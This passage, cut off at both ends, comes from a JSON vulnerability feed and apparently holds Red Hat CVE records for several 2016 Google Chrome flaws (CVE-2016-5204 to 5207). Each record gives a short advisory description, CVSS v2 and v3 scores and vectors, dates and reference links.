"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5204"], "modified": "2020-08-18T08:39:07", "id": "RH:CVE-2016-5204", "href": "https://access.redhat.com/security/cve/cve-2016-5204", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:52:11", "description": "In Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android, corruption of the DOM tree could occur during the removal of a full screen element, which allowed a remote attacker to achieve arbitrary code execution via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-12-02T08:50:59", "type": "redhatcve", "title": "CVE-2016-5207", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5207"], "modified": "2020-08-18T08:39:16", "id": "RH:CVE-2016-5207", "href": "https://access.redhat.com/security/cve/cve-2016-5207", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:52:12", "description": "The PDF plugin in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android incorrectly followed redirects, which allowed a remote attacker to bypass the Same Origin Policy via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-02T08:49:17", "type": "redhatcve", "title": "CVE-2016-5206", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5206"], "modified": "2020-08-18T08:39:14", "id": "RH:CVE-2016-5206", "href": "https://access.redhat.com/security/cve/cve-2016-5206", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:52:16", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Linux, Windows and Mac, incorrectly handles deferred page loads, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-12-02T08:49:24", "type": "redhatcve", "title": "CVE-2016-5205", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5205"], "modified": "2020-08-18T08:39:13", "id": "RH:CVE-2016-5205", "href": "https://access.redhat.com/security/cve/cve-2016-5205", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:52:12", "description": "A heap use after free in V8 in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV